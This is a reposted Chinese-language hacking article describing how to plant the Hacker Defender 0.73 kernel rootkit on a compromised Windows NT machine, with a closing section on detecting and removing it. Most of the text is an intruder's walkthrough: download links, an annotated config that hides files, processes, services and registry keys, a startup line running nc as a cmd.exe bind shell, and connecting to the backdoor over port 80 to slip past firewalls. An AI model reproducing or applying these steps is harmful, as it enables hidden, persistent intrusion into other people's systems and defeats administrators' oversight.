介绍一个运行在NT系统下内核级Rootkit及删除方法
介绍一个运行在NT系统下内核级Rootkit及删除方法入侵了一台电脑后,我们总想留个后门,方便以后进来,现在网上有非常多的免费的 后门,我用了一下,都比较容易被查出来,(如用Fport就可以看见哪个程序打开了哪个端口), Lion 的Ping 后门,虽然不开端口,但
介绍一个运行在NT系统下内核级Rootkit及删除方法
入侵了一台电脑后,我们总想留个后门,方便以后进来,现在网上有非常多的免费的
后门,我用了一下,都比较容易被查出来,(如用Fport就可以看见哪个程序打开了哪个端口),
Lion 的Ping 后门,虽然不开端口,但是还是增加了一个ssms服务 亮眼人一下子就会发现的,
在网上找了好久,终于让我找到了一个非常好的Rootkit 呵呵!这就是 "Hacker Defender" 目
前的版本是 0.73 大家可以在 http://rootkit.host.sk/ (一些朋友需要代理才能访问的)
下载到这个 Rootkit。
这个Rootkit 究竟有什么特殊的功能呢? 首先下载解压后我们来看一下,应该有以下的文件:
------------------------------------------------------------------
hxdef073.exe 50 688 b - program Hacker defender v0.7.3
hxdef073.ini 1 661 b - inifile with default settings
bdcli073.exe 30 208 b - backdoor client
rdrbs073.exe 48 640 b - redirectors base
readmecz.txt 15 553 b - czech version of help file
readmeen.txt 15 523 b - help file
-------------------------------------------------------------------
hxdef073 是主程序,大家不要运行!!!!
hxdef073.ini 是配置文件
bdcli073.exe 连接后门用客户端
rdrbs073.exe 转向程序(类似与端口转发)
readmecz.txt 捷克斯洛伐克语说明文件
readmeen.txt 英语说明文件
我们要用Rootkit 先要配置一下ini 文件 打开 hxdef073.ini 我简单的介绍
一下各个说明选项
--------------------------------------------------------------
[Hidden Table] ; 要隐藏的列表,支持通配符,比如这里所
hxdef* ;hxdef 开头的都将不在任务管理器及资源管理
rcmd.exe ;器里出现,大家可以自己在这里添加要隐藏的
;文件,目录及进程,一个一行
[Root Processes] ;这里是能够看见隐藏列表里进程,支持通配符
hxdef* ;比如,我喜欢用Wollf ,那就把wollf.exe 加
rcmd.exe ;到这里,这样telnet 到Wollf里就可以看见隐藏
;在列表里的冬冬。
[Hidden Services] ;这里是要隐藏服务的列表,支持通配符,
HackerDefender* ;这里有点问题,我下面会讲
[Hidden RegKeys] :这里是隐藏注册表的Regkey
HackerDefender073
LEGACY_HACKERDEFENDER073
[Hidden Regvalues] ;这里是隐藏注册表的 values
[Startup Run] :这是Rootkit 启动后要运行什么冬冬就把他加到这里
;比如 c:sys
c.exe?-L -p 100 -t -e cmd.exe
;这样nc在Rootkit 启动后就会运行并兼听 100
[Settings]
Password=hxdef-rulez ;这里设置连接后门用密码,大家自己改吧:)
BackdoorShell=hxdef?.exe ;连进来后shell 的名字,Rootkit会把CMD.EXE复制一份 ;一个份,运行完毕后就会删掉的
ServiceName=HackerDefender073 ;安装的服务名称
DisplayName=HXD Service 073 ;显示的服务名称
ServiceDescription=powerful NT rootkit ;服务的描述。
[Comments] ; 注解
--------------------------------------------------------------------
大家把ini 文件配置好后,把
hxdef073.exe
hxdef073.ini
Copy 到对方的机器上运行就可以了,不需要重启机器,Rootkit就会开始工作了!
如果对方开了WWW, FTP, SMTP 我们就可以用 bdcli073.exe连上去
用法 :bdcli073 IP 端口 密码
比如对方的IP是192.168.0.1 www 端口开在 80 ,Rootkit 的密码是 hxdef-rulez
那我们就可以开个CMD,用这样 "bdcli073 192.168.0.1 80 hxdef-rulez"
一会儿对方的 "c:winntsystem32"就会出现在我们面前,这可是用 80 端口通讯的,
可以穿过一些防火墙,呵呵! 我自己
测试。53端口的DNS 服务也可以作为通讯端口,
哈哈!比一般的后门要强多了吧,不开新的端口,而且Administrator用系统自带的工
具查不到 我们隐藏的文件,进程,及服务!!!对是服务,哈哈种上 Wollf,
Administrator 在服务管理器里也看不见!!那不是天下无敌!!NO!NO!NO!
因为一些原因 在这里还有一些破绽,虽然Administrator在任务管理器里看不见
Wollf 这个进程 ,但是 Fport 却可以看见 wollf 兼听7614 这个端口,晕~ 但是
作者在他的主页写下,他正在增加这个功能,下一个版本将会增加一些代码,到时
netstat -a -n 与 Fport 等工具将发现不了被隐藏的端口,(本来这篇文章想在新
版本发布时再写的,不过我自己在木马
论坛(bbs.mmbest.com 做一下广告)说漏了嘴,
导致了这篇文章的早产 :))还有一些 破绽,因为Rootkit 自身的原因导致了 "it
is possible to hide registry keys and values, services and files during
remote sessions."(这是原文大家自己查字典吧)其实就是无法完美的隐藏,
我测试过"DameWare NT Utilities"&srvinstw.exe (W2k Resource Kit 里的工具)
可以看见隐藏的服务,但看不见隐藏的进程,这是不完美的,因此我们可以
用 "DameWare NT Utilities"&srvinstw.exe 来删除这个 Rootkit运行srvinstw.exe,
选择remove a service,然后选择 HackerDefender073, 同样用 sc.exe 也可以做到,
前提是你知道 Rootkit的安装服务的名字,也许黑客把他会改成其他的名字,呵呵那好办,
打开服务管理器和srvinstw.exe 两个一对照,有那个服务出现在 srvinstw.exe而没有
出现在 服务管理器里那么你就要注意了!! 记下文件的路径和文件名,用软盘启动
,因为那样是不会启动 Rootkit 的 找一下有没有和那个文件名相同的ini ,如果有,
打开来看看里面是什么?删除的方法也很简单,把 exe 和同名的 ini 文件删掉就可以
了,这样 Rootkit再下一次启动时就不会运行了,最好推荐重装系统,谁知道还留下了
其它的什么后门,而且如果是2k你的密码多半被人知道了,再加上 克隆 账号 HoHo~
我不知道了........
后记: 本来不怎么想写这篇文章的,写出来,国内的很多机器又要遭殃了,我真的
不知道我写这篇文章是对还是错,一些好的网管,也许提高了
安全意识,而另一些对
安全所谓的,写也是白写,有些人只要用一下冰河就可以把一些网站玩弄在手掌上,
如果被人种上这个 Rootkit.......
还有我本人是菜鸟一个,跟这个作者一点点关系也没有,虽然很想写一个这样的Rootkit
可是水平太低,远远不够。作者在主页里写道 下一个版本将在3.1 号发布,感兴趣的朋
友可以关注一下作者的主页,不能访问作者主页的朋友,我已经把这个放到我的主页空间
里了,大家可以通过以下连接下载 http://rootkit.go.3322.org/rootkit/hxdef073.zip
原文转自:http://www.ltesting.net
|